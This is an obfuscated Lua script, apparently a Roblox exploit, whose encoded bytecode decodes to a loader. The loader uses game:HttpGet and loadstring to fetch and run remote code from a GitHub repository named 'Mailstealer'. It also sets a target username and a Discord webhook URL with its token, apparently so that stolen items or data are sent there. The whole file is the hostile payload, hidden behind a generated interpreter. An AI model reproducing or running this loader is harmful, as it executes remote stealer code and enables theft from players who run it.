--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.14) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v84=0;local v85;while true do if (v84==(0 -0)) then v85=(v31/((5 -3)^(v32-1)))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -((2192 -(1523 + 114)) + 64)))) + (932 -(857 + 74)))) ;return v85-(v85%1) ;end end else local v86=568 -(367 + 181 + 20) ;local v87;while true do if (v86==(927 -(214 + (1015 -302)))) then v87=2^(v32-(1 + 0)) ;return (((v31%(v87 + v87))>=v87) and (1 + 0)) or (877 -((1347 -(68 + 997)) + 595)) ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + ((2230 -(892 + 65)) -(226 + 1044)) );v19=v19 + (17 -13) ;return (v37 * (16777333 -(32 + 85))) + (v36 * (64226 + 1310)) + (v35 * ((135 -78) + 199)) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0;local v39;local v40;local v41;local v42;local v43;local v44;local v45;local v46;local v47;while true do if ((30 -(22 + 7))~=v38) then else v41=nil;v42=nil;v38=1 + 1 ;end if (v38==(2 + 0)) then v43=nil;v44=nil;v38=3;end if (v38~=3) then else v45=nil;v46=nil;v38=2 + 2 ;end if (v38~=(0 -0)) then else v39=1985 -(1266 + 719) ;v40=nil;v38=604 -(268 + 335) ;end if (v38~=(294 -(60 + 230))) then else v47=nil;while true do if ((1022 -(697 + 321))==v39) then while true do if (v40==(573 -(426 + 146))) then local v104=0 + 0 ;local v105;while true do if (v104==(0 -0)) then v105=1456 -(282 + 1174) ;while true do if (1==v105) then v40=813 -(569 + 242) ;break;end if (v105==(0 -0)) then local v135=0 -0 ;while true do if (v135==0) then v43=nil;v44=nil;v135=1 + 0 ;end if (v135==(612 -(602 + 9))) then v105=1025 -(706 + 318) ;break;end end end end break;end end end if (v40~=(1253 -(721 + 530))) then else local v106=1271 -(945 + 326) ;while true do if (v106==0) then v45=nil;v46=nil;v106=2 -1 ;end if (1==v106) then v40=950 -(245 + 702) ;break;end end end if (v40~=3) then else v47=nil;while true do local v108=0 + 0 ;local v109;local v110;while true do if (v108==(700 -(271 + 429))) then v109=0 + 0 ;v110=nil;v108=1;end if (v108~=(1501 -(1408 + 92))) then else while true do if (v109==(1898 -(260 + 1638))) then v110=1086 -(461 + 625) ;while true do if (v110~=0) then else if (v41~=3) then else local v167=0 -0 ;local v168;local v169;while true do if (v167==(1 + 0)) then while true do if (v168~=(1288 -(993 + 295))) then else v169=0 + 0 ;while true do if (v169~=(1171 -(418 + 753))) then else for v192=1 + 0 ,v24() do v43[v192-(1 + 0) ]=v29();end return v45;end end break;end end break;end if (v167==(0 + 0)) then v168=0 + 0 ;v169=nil;v167=1 + 0 ;end end end if (v41==(529 -(406 + 123))) then local v170=1769 -(1749 + 20) ;local v171;local v172;while true do if (v170~=(1464 -(1404 + 59))) then else while true do if (v171==(0 + 0)) then v172=0 -0 ;while true do if (v172~=(1322 -(1249 + 73))) then else v42={};v43={};v172=1 + 0 ;end if ((1146 -(466 + 679))==v172) then v44={};v41=766 -(468 + 297) ;break;end end break;end end break;end if (0==v170) then v171=562 -(334 + 228) ;v172=nil;v170=3 -2 ;end end end v110=2 -1 ;end if (v110==(2 -1)) then if (v41==(5 -3)) then local v173=1900 -(106 + 1794) ;while true do if (v173~=(1 + 0)) then else for v177=1 + 0 ,v24() do local v178=0 -0 ;local v179;local v180;local v181;while true do if (v178~=(2 -1)) then else v181=nil;while true do if (v179==(0 -0)) then local v194=114 -(4 + 110) ;while true do if (v194==(1 + 0)) then v179=585 -(57 + 527) ;break;end if (v194==(0 -0)) then v180=0 + 0 ;v181=nil;v194=1;end end end if (v179==(1 + 0)) then while true do if ((1427 -(41 + 1386))==v180) then v181=v22();if (v21(v181,104 -(17 + 86) ,1)==(0 + 0)) then local v196=0;local v197;local v198;local v199;local v200;local v201;while true do if (v196~=(0 + 0)) then else v197=0;v198=nil;v196=1;end if ((1 -0)==v196) then local v203=0;while true do if (v203==(2 -1)) then v196=2;break;end if (v203==0) then v199=nil;v200=nil;v203=1;end end end if (v196~=2) then else v201=nil;while true do if (v197~=(166 -(122 + 44))) then else v198=0 -0 ;v199=nil;v197=1;end if (v197==(1 -0)) then local v208=0;while true do if (v208==1) then v197=2;break;end if (v208~=(0 -0)) then else v200=nil;v201=nil;v208=1 + 0 ;end end end if (v197==(4 -2)) then while true do if (v198~=(0 + 0)) then else local v209=0 + 0 ;local v210;while true do if (v209==(0 -0)) then v210=65 -(30 + 35) ;while true do if (v210~=(0 + 0)) then else local v220=1790 -(573 + 1217) ;local v221;while true do if (v220==(1257 -(1043 + 214))) then v221=0 -0 ;while true do if (v221==(2 -1)) then v210=1;break;end if (v221==(0 + 0)) then v199=v21(v181,1214 -(323 + 889) ,7 -4 );v200=v21(v181,5 -1 ,6);v221=940 -(714 + 225) ;end end break;end end end if (v210~=(2 -1)) then else v198=1;break;end end break;end end end if (v198~=(2 -0)) then else local v211=0;local v212;while true do if (v211~=0) then else v212=580 -(361 + 219) ;while true do if (v212~=(320 -(53 + 267))) then else local v222=0 + 0 ;while true do if (v222==(1 -0)) then v212=807 -(118 + 688) ;break;end if (v222==(48 -(25 + 23))) then if (v21(v200,414 -(15 + 398) ,1)==(983 -(18 + 964))) then v201[2]=v47[v201[6 -4 ]];end if (v21(v200,2,7 -5 )~=(1 -0)) then else v201[2 + 1 ]=v47[v201[2 + 1 ]];end v222=851 -(20 + 830) ;end end end if (v212==(2 -1)) then v198=3 + 0 ;break;end end break;end end end if (v198==(2 -1)) then local v213=126 -(116 + 10) ;local v214;while true do if (v213==(0 -0)) then v214=0;while true do if (v214==(1796 -(503 + 1293))) then local v223=0 + 0 ;local v224;while true do if (v223~=0) then else v224=738 -(542 + 196) ;while true do if (v224~=(1062 -(810 + 251))) then else v214=1 -0 ;break;end if (v224~=(0 + 0)) then else local v230=0 + 0 ;while true do if (v230==(1 + 0)) then v224=734 -(711 + 22) ;break;end if ((0 -0)~=v230) then else v201={v23(),v23(),nil,nil};if (v199==0) then local v231=1551 -(1126 + 425) ;local v232;local v233;while true do if (v231==(405 -(118 + 287))) then v232=0 -0 ;v233=nil;v231=1122 -(118 + 1003) ;end if (v231==(2 -1)) then while true do if (v232~=(377 -(142 + 235))) then else v233=0 -0 ;while true do if (v233==(0 + 0)) then v201[980 -(553 + 424) ]=v23();v201[4]=v23();break;end end break;end end break;end end elseif (v199==(1 + 0)) then v201[2 + 1 ]=v24();elseif (v199==2) then v201[5 -2 ]=v24() -((8 -6)^(15 + 1)) ;elseif (v199==3) then local v236=0 + 0 ;local v237;local v238;while true do if (v236==(0 + 0)) then v237=0;v238=nil;v236=1 + 0 ;end if (1~=v236) then else while true do if (v237==(406 -(183 + 223))) then v238=0 -0 ;while true do if (v238==(0 + 0)) then v201[6 -3 ]=v24() -((5 -3)^(6 + 10)) ;v201[8 -4 ]=v23();break;end end break;end end break;end end end v230=1;end end end end break;end end end if (v214~=(338 -(10 + 327))) then else v198=2;break;end end break;end end end if (v198==3) then if (v21(v200,3,1 + 2 )~=(4 -3)) then else v201[757 -(239 + 514) ]=v47[v201[2 + 2 ]];end v42[v177]=v201;break;end end break;end end break;end end end break;end end break;end end break;end if (v178==(1329 -(797 + 532))) then v179=338 -(118 + 220) ;v180=nil;v178=1 + 0 ;end end end v41=452 -(108 + 341) ;break;end if (v173==0) then local v176=0 + 0 ;while true do if (v176==(0 -0)) then for v185=1203 -(373 + 829) ,v46 do local v186=0 -0 ;local v187;local v188;local v189;local v190;local v191;while true do if ((1495 -(711 + 782))~=v186) then else v191=nil;while true do if (1~=v187) then else local v195=731 -(476 + 255) ;while true do if (v195~=1) then else v187=3 -1 ;break;end if (v195==(1130 -(369 + 761))) then v190=nil;v191=nil;v195=470 -(270 + 199) ;end end end if (v187~=0) then else v188=0 + 0 ;v189=nil;v187=1820 -(580 + 1239) ;end if ((2 -0)==v187) then while true do if (v188==(1 -0)) then v191=nil;while true do if (v189~=1) then else if (v190==(2 -1)) then v191=v22()~=(238 -(64 + 174)) ;elseif (v190==(1 + 1)) then v191=v25();elseif (v190~=(3 -0)) then else v191=v26();end v47[v185]=v191;break;end if (v189~=(336 -(144 + 192))) then else local v205=216 -(42 + 174) ;local v206;while true do if (v205==(0 + 0)) then v206=0 + 0 ;while true do if ((1 + 0)==v206) then v189=1505 -(363 + 1141) ;break;end if (v206==(1580 -(1183 + 397))) then local v216=0 -0 ;local v217;while true do if (v216==0) then v217=0 + 0 ;while true do if (1~=v217) then else v206=1 + 0 ;break;end if (v217~=(0 + 0)) then else local v225=1167 -(645 + 522) ;while true do if (v225~=0) then else v190=v22();v191=nil;v225=1;end if (v225==(1976 -(1913 + 62))) then v217=1 + 0 ;break;end end end end break;end end end end break;end end end end break;end if (v188==(0 + 0)) then local v202=0;while true do if (v202==(4 -3)) then v188=2 -1 ;break;end if (v202~=(1933 -(565 + 1368))) then else local v207=0 -0 ;while true do if (v207==(0 -0)) then v189=1661 -(1477 + 184) ;v190=nil;v207=506 -(351 + 154) ;end if (v207==1) then v202=1 -0 ;break;end end end end end end break;end end break;end if (v186==(1 + 0)) then v189=nil;v190=nil;v186=858 -(564 + 292) ;end if (v186==(1559 -(1381 + 178))) then v187=0;v188=nil;v186=1 + 0 ;end end end v45[4 -1 ]=v22();v176=1;end if ((1 + 0)~=v176) then else v173=1;break;end end end end end if (v41~=(2 -1)) then else local v174=304 -(244 + 60) ;local v175;while true do if (v174~=(0 + 0)) then else v175=476 -(41 + 435) ;while true do if (v175==(0 + 0)) then local v183=470 -(381 + 89) ;local v184;while true do if (0~=v183) then else v184=0 + 0 ;while true do if (v184==1) then v175=1002 -(938 + 63) ;break;end if (v184~=0) then else v45={v42,v43,nil,v44};v46=v24();v184=1;end end break;end end end if (v175~=(1785 -(214 + 1570))) then else v47={};v41=1127 -(936 + 189) ;break;end end break;end end end break;end end break;end end break;end end end break;end if (v40==(0 + 0)) then local v107=0 + 0 ;while true do if ((1613 -(1565 + 48))==v107) then local v111=0 + 0 ;while true do if (v111~=0) then else v41=0 -0 ;v42=nil;v111=1727 -(1668 + 58) ;end if (v111==(1139 -(782 + 356))) then v107=627 -(512 + 114) ;break;end end end if (v107==1) then v40=1;break;end end end end break;end if (v39==(267 -(176 + 91))) then local v102=0;while true do if (v102~=0) then else v40=0 -0 ;v41=nil;v102=2 -1 ;end if (v102==1) then v39=1;break;end end end if (v39~=(4 -1)) then else v46=nil;v47=nil;v39=1096 -(975 + 117) ;end if (v39~=(1876 -(157 + 1718))) then else v42=nil;v43=nil;v39=2;end if (2~=v39) then else v44=nil;v45=nil;v39=3;end end break;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v48=0 + 0 ;local v49;local v50;local v51;local v52;local v53;local v54;while true do if (v48==(1 + 2)) then if (v53==(0 + 0)) then if (v52==0) then return v54 * (0 -0) ;else v53=1995 -((529 -420) + 1885) ;v51=1469 -(1269 + 200) ;end elseif (v53==2047) then return ((v52==(0 -0)) and (v54 * ((816 -(98 + 717))/((2445 -(1427 + 192)) -(802 + 9 + 15))))) or (v54 * NaN) ;end return v8(v54,v53-(1764 -741) ) * (v51 + (v52/((2 -0)^(8 + 44)))) ;end if ((2 + 0)==v48) then v53=v21(v50,21,6 + 25 );v54=((v21(v50,7 + 25 )==(2 -1)) and  -((2 + 0) -1)) or 1 ;v48=9 -6 ;end if (v48==(1 + 0 + 0)) then v51=1;v52=(v21(v50,1,(335 -(192 + 134)) + (1287 -(316 + 960)) ) * ((2 + 0 + 0 + 0)^(24 + 8))) + v49 ;v48=2;end if (v48==(0 + 0)) then v49=v24();v50=v24();v48=1434 -(797 + 636) ;end end end v26=nil;function v26(v55)local v56=0 + 0 ;local v57;local v58;while true do if (v56==(3 + 0)) then return v6(v58);end if (v56==(3 -2)) then v57=v3(v16,v19,(v19 + v55) -(552 -(83 + 468)) );v19=v19 + v55 ;v56=1808 -(1202 + 604) ;end if (v56==(9 -7)) then v58={};for v93=(1949 -(1096 + 852)) -0 , #v57 do v58[v93]=v2(v1(v3(v57,v93,v93)));end v56=2 + 1 ;end if (v56==(0 -(0 -0))) then v57=nil;if  not v55 then local v99=0 + 0 ;while true do if (v99==(1772 -(1733 + 39))) then v55=v24();if (v55==(325 -(45 + 280))) then return "";end break;end end end v56=1 + 0 ;end end end v18=5;end if (v18==2) then function v22()local v59=v1(v16,v19,v19);v19=v19 + 1 ;return v59;end v23=nil;function v23()local v60=0 + 0 ;local v61;local v62;while true do if ((513 -(409 + 23 + 80))==v60) then return (v62 * (492 -(46 + 190))) + v61 ;end if ((95 -(51 + 25 + 19))==v60) then v61,v62=v1(v16,v19,v19 + 2 );v19=v19 + 2 ;v60=727 -(228 + (1161 -(174 + 489))) ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v63)if (v1(v63,2)==79) then local v88=0;while true do if (v88==0) then v20=v0(v3(v63,1,1));return "";end end else local v89=0;local v90;while true do if (v89==0) then v90=v2(v0(v63,16));if v20 then local v103=v5(v90,v20);v20=nil;return v103;else return v90;end break;end end end end);v18=1;end if (v18==7) then function v30(v64,v65,v66)local v67=v64[1];local v68=v64[2];local v69=v64[3];return function(...)local v70=v67;local v71=v68;local v72=v69;local v73=v28;local v74=1;local v75= -1;local v76={};local v77={...};local v78=v12("#",...) -1 ;local v79={};local v80={};for v91=0,v78 do if (v91>=v72) then v76[v91-v72 ]=v77[v91 + 1 ];else v80[v91]=v77[v91 + 1 ];end end local v81=(v78-v72) + 1 ;local v82;local v83;while true do local v92=0;while true do if (1==v92) then if (v83<=9) then if (v83<=4) then if (v83<=1) then if (v83>0) then local v112=0;local v113;local v114;while true do if (v112==0) then v113=v82[2];v114=v80[v82[3]];v112=1;end if (v112==1) then v80[v113 + 1 ]=v114;v80[v113]=v114[v82[4]];break;end end else v80[v82[2]]=v66[v82[3]];end elseif (v83<=2) then v74=v82[3];elseif (v83==3) then v80[v82[2]]();else local v136=v82[2];local v137,v138=v73(v80[v136](v13(v80,v136 + 1 ,v82[3])));v75=(v138 + v136) -1 ;local v139=0;for v152=v136,v75 do local v153=0;while true do if (0==v153) then v139=v139 + 1 ;v80[v152]=v137[v139];break;end end end end elseif (v83<=6) then if (v83==5) then local v118=0;local v119;local v120;local v121;local v122;while true do if (v118==0) then v119=v82[2];v120,v121=v73(v80[v119](v13(v80,v119 + 1 ,v82[3])));v118=1;end if (v118==2) then for v160=v119,v75 do local v161=0;while true do if (v161==0) then v122=v122 + 1 ;v80[v160]=v120[v122];break;end end end break;end if (v118==1) then v75=(v121 + v119) -1 ;v122=0;v118=2;end end else local v123=v82[2];v80[v123]=v80[v123](v13(v80,v123 + 1 ,v75));end elseif (v83<=7) then v80[v82[2]]=v82[3];elseif (v83==8) then v66[v82[3]]=v80[v82[2]];else do return;end end elseif (v83<=14) then if (v83<=11) then if (v83>10) then v74=v82[3];else local v128=0;local v129;local v130;while true do if (v128==0) then v129=v82[2];v130=v80[v82[3]];v128=1;end if (v128==1) then v80[v129 + 1 ]=v130;v80[v129]=v130[v82[4]];break;end end end elseif (v83<=12) then v80[v82[2]]=v82[3];elseif (v83>13) then v80[v82[2]]();else local v142=v82[2];v80[v142]=v80[v142](v13(v80,v142 + 1 ,v75));end elseif (v83<=16) then if (v83==15) then if (v80[v82[2]]==v82[4]) then v74=v74 + 1 ;else v74=v82[3];end else v80[v82[2]]=v66[v82[3]];end elseif (v83<=17) then do return;end elseif (v83>18) then if (v80[v82[2]]==v82[4]) then v74=v74 + 1 ;else v74=v82[3];end else v66[v82[3]]=v80[v82[2]];end v74=v74 + 1 ;break;end if (v92==0) then v82=v70[v74];v83=v82[1];v92=1;end end end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0B3O00028O00026O00F03F03093O00557365724E616D653203063O00727368656479030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F45676F72696B7573612F4D61696C737465616C65722F6D61696E2F656E67696E6503083O00557365724E616D6503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31333739332O3631333037393531393331342F684B796A46554F495F4245374C6A71595665544F575552776C5A775647723776474A674E54374A5559745852686F4E396977357A6E6F39486866373066635647616B785F00163O00120C3O00013O0026133O000D0001000200040B3O000D000100120C000100043O002O12000100033O001210000100053O001210000200063O00200A00020002000700120C000400084O0005000200044O000600013O00022O000E00010001000100040B3O001500010026133O00010001000100040B3O0001000100120C000100043O002O12000100093O00120C0001000B3O002O120001000A3O00120C3O00023O00040B3O000100012O00093O00017O00",v9(),...);
